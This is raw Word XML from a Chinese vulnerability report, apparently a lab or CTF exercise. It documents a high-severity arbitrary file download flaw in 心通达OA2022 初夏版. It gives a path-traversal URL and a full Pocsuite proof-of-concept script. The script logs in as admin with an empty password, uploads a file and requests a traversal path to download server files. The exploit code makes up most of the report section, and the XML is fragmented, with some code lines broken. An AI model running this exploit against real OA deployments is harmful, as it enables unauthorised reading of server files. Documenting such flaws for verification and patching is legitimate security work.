        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功，证明漏洞存在。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C04161D" w14:textId="2DF66226" w:rsidR="00DB0454" w:rsidRPr="00E1719F" w:rsidRDefault="00000000" w:rsidP="00E1719F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc25120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞信息</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38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1644"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1740"/>
        <w:gridCol w:w="1569"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0454" w14:paraId="26A2D3F3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3D15850" w14:textId="77777777" w:rsidR="00DB0454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UVD-ID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5BF9E" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB045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4DFFA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298C" w14:textId="3BB39F50" w:rsidR="00DB0454" w:rsidRDefault="00E1719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任意文件读取下载漏洞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73D4C0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8B03" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB045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DB0454" w14:paraId="36C6A0B4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FA9CD4B" w14:textId="77777777" w:rsidR="00DB0454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A30B" w14:textId="4F742120" w:rsidR="00DB0454" w:rsidRDefault="00E1719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022.7.17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CACF1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927C" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB045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577F54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A304" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB045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DB0454" w14:paraId="4E168BB7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D0FE178" w14:textId="77777777" w:rsidR="00DB0454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AEC1" w14:textId="3A7E6A03" w:rsidR="00DB0454" w:rsidRDefault="00E1719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022.7.21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20D2F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B391" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB045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5A64D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D614" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB045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DB0454" w14:paraId="099D46C7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1FACC23" w14:textId="77777777" w:rsidR="00DB0454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40B2" w14:textId="5E407036" w:rsidR="00DB0454" w:rsidRDefault="00E1719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高危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9CA84E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A8A8" w14:textId="6885ACB4" w:rsidR="00DB0454" w:rsidRDefault="00E1719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吕昆娴、运开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DFF339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A269" w14:textId="5FCCF32A" w:rsidR="00DB0454" w:rsidRDefault="00E1719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心通达</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>OA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、任意文件读取下载漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="0C7CFC14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1B0EF58" w14:textId="77777777" w:rsidR="00DB0454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05DF" w14:textId="6E06DAE5" w:rsidR="00DB0454" w:rsidRDefault="00E1719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Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>心通达</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>OA2022</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>初夏版</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="19D3331C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1DF4A5B" w14:textId="77777777" w:rsidR="00DB0454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来源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5CA6" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB045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DB0454" w14:paraId="342B1567" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="41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65C74BD" w14:textId="77777777" w:rsidR="00DB0454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6003" w14:textId="205332F7" w:rsidR="00DB0454" w:rsidRDefault="00E1719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E1719F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>心通达</w:t>
            </w:r>
            <w:r w:rsidRPr="00E1719F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>OA2022</w:t>
            </w:r>
            <w:r w:rsidRPr="00E1719F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初夏版存在任意文件下载漏洞，可以通过在个人文件柜上传文件后</w:t>
            </w:r>
            <w:r w:rsidRPr="00E1719F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.png</w:t>
            </w:r>
            <w:r w:rsidRPr="00E1719F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，访问下载文件的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E1719F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:r w:rsidRPr="00E1719F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00E1719F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>http://127.0.0.1:8080/file/downFileContent?contentId=1&amp;sortName=../../</w:t>
            </w:r>
            <w:r w:rsidRPr="00E1719F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）达到任意文件下载的目的。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="3AAEACA8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3E0E0BD" w14:textId="77777777" w:rsidR="00DB0454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A813" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454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DB0454" w14:paraId="640A6B30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A227502" w14:textId="77777777" w:rsidR="00DB0454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AE9B" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454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DB0454" w14:paraId="681687E9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EBF0C71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C7F" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="2B9B42C7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368E331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FD8E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>#!/usr/bin/env python</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B6257A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># -*- coding: utf-8 -*-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27C87A96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>import time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="511387FC" w14:textId="77777777" w:rsidR="000E0920" w:rsidRPr="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7554B0ED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>from pocsuite.api.request import req</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D1460E5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>from pocsuite.api.poc import register, Output, POCBase</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D60124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>from pocsuite.thirdparty.guanxing import parse_ip_port, http_packet, make_verify_url, dnslog</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29F694A7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>import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73B18496" w14:textId="77777777" w:rsidR="000E0920" w:rsidRPr="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7C3857FD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>class TestPOC(POCBase):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18947B86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vulID = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13538BD7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cveID = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07286783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cnvdID = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3417CD1B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cnnvdID = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10244759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version = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AD1E032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author = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4092C737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vulDate = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59F155C8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createDate = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A74BA77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updateDate = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B2234C9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name = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A4FB66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desc = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F1617F1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solution = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA12FB3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 xml:space="preserve">severity = '''''' </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BAFB3E1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vulType = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E948E03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taskType = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6418E9A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lastRenderedPageBreak/>
              <w:tab/>
              <w:t>references = ['''''']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AC94A7F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appName = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="073BA9E8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appVersion = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F1CC80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appPowerLink = ''''''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="553F0C36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samples = ['']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EC458EB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install_requires = ['''''']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D941F63" w14:textId="77777777" w:rsidR="000E0920" w:rsidRPr="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36850816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def _attack(self):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2893F5DB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return self._verify()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4B9F6F" w14:textId="77777777" w:rsidR="000E0920" w:rsidRPr="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23304D1A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def _verify(self):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F0AA7E1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self.url,ip,port = parse_ip_port(self.target, 8080)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26D71684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result = {}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24878D23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s = req.session()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F3E409E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headers = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1241E37D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'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04C0F015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'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78C6F58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'Referer':self.url</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03C6E43D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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="002EACB0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</w:p>
          <w:p w14:paraId="19A39C14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path = '/login'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A77153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data = '''userAgent=pcc&amp;loginId=1001&amp;username=admin&amp;password='''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16B35EFE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vulur = make_verify_url(self.url, path, mod = 0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A4FFA28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base_resp = s.post(vulur, headers = headers, verify = False, allow_redirects = False, timeout = 10000, data = data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="693CC019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if base_resp.status_code == 200 and '</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>系统管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>' in base_resp.content and 'redisSessionId' in base_resp.headers['Set-Cookie']:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA26AC1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path_1 = '''/main'''</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>#refer</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的路径</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23E648A1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path_2 = '''/todoList/queryUserByUserId?userName=%E4%B8%AA%E4%BA%BA%E6%96%87%E4%BB%B6%E6%9F%9C&amp;_=1658242161059 '''</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>提交请求的路径</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="547D0C26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vulurl_1 = make_verify_url(self.url, path_1, mod=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C47E877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vulurl_2 = make_verify_url(self.url, path_2, mod=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DAE1531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headers_1 = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6FCB39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'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD41C0E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'Referer': vulurl_1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D451076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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D9574B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resp = s.get(vulurl_2, headers = headers_1, verify = False, allow_redirects = False, timeout = 10000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39ABF922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#</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>模拟搜索文件柜</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="158166F8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if "flag" in resp.content and resp.status_code == 200:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2057F4DD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path_3 = '''/newFilePri/personalFileCabinet'''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="695981A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lastRenderedPageBreak/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vulurl_3 = make_verify_url(self.url, path_3, mod=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29D096F3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resp = s.get(vulurl_3, headers=headers_1, verify=False, allow_redirects=False, timeout = 10000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="423BBE98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#</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>模拟点击文件柜</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="090BB0A7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if "</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>个人文件柜</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>" in resp.content and resp.status_code == 200:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2084AB92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path_4='''/newFilePub/newFiles?sortId=0&amp;text=&amp;'''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CB6BCA9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vulurl_4 = make_verify_url(self.url, path_4, mod=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="297050D9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resp = s.get(vulurl_4, headers=headers_1, verify=False, allow_redirects=False, timeout = 10000)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54DA6A2D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#</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>模拟新建文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A2815EA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if "</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>文件内容</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>" in resp.content and resp.status_code == 200:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EDD9C7B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path_5 = '''/upload?module=file_folder'''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C8F8C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vulurl_5 = make_verify_url(self.url, path_5, mod=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06FD62F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headers_5={</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41CB0BDA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'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25928DC7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'Content-Type': 'multipart/form-data; boundary=---------------------------87496988812295579252070633351',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0255CE22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'Referer': vulurl_4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30D1A2BA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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755C9223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boundary = '---------------------------87496988812295579252070633351'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5F2E04" w14:textId="77777777" w:rsidR="000E0920" w:rsidRPr="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D753F79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data_5 = []</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6610CDB6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data_5.append('--%s' % boundary)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DB0A745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data_5.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('file', 'test.png'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0DC7F9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data_5.append( 'Content-Type: %s\r\n' %'img/png')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44BD875B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fr = open(r'/home/kali/Desktop/1.png')</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>这里放待上传的本地图片路径，图片名称为</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1.png</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35FE771D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data_5.append(fr.read())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E2C7131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fr.close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09FF66F4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data_5.append('--%s--\r\n' % boundary)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="261D65C0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httpbody='\r\n'.join(data_5)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D538B0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resp = s.post(vulurl_5, headers=headers_5, verify=False, allow_redirects=False, data=httpbody, timeout = 10000)</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>模拟附件上传</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EEC8BC9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if "attUrl" in resp.content and resp.status_code == 200:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73BB5B4F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path = '''/file/downFileContent?contentId=1&amp;sortName=./'''</w:t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#</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>访问新</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>下载</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>zip</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>包</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75AAD5DD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vul_url = make_verify_url(self.url, path, mod = 0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35DB7C57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Cookie = re.findall(r'(.*?);', base_resp.headers["Set-Cookie"])[0]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="403DF597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print(Cookie)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24036F7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myurl=(self.url).replace("http://","")</w:t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#url</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>格式</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>去掉</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32D8A26B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myurl=myurl.replace("/","")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BDBA974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headers1 = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7500A506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'Host':myurl,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34C7C7DF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"Cookie": Cookie</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F4B970B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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41EE6374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temp=req.session()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="716A26B0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resp = temp.get(vul_url, headers = headers1, verify = False, allow_redirects = False, timeout = 10)</w:t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#</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>发包请求下载</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>zip file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="105B2E11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if ('content-disposition' in resp.headers or 'attachment; filename="./.zip"' in resp.headers) and resp.status_code ==200:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15030D08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</w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>返回包中存在</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>attachment</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>即说明文件可以下载，漏洞验证存在</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3117B0FE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result['VerifyInfo'] = http_packet(resp)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74EDC5E1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result['VerifyInfo']['URL'] = vul_url</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60CD3F20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result['VerifyInfo']['port'] = port</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CFB882A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result['VerifyInfo']['Content'] = resp.text[:200]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18A38F6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return self.parse_output(result)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55C1E5BE" w14:textId="77777777" w:rsidR="000E0920" w:rsidRPr="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A979D1E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return self.parse_output(result)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75733B5F" w14:textId="77777777" w:rsidR="000E0920" w:rsidRPr="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60B9A38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  <w:t>def parse_output(self, result):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CC40B66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#parse output</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17F62438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output = Output(self)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58D83BDA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if result:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A7D0D48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output.success(result)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A73835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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C83322C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output.fail('Internet nothing returned')</w:t>
            </w:r>
          </w:p>
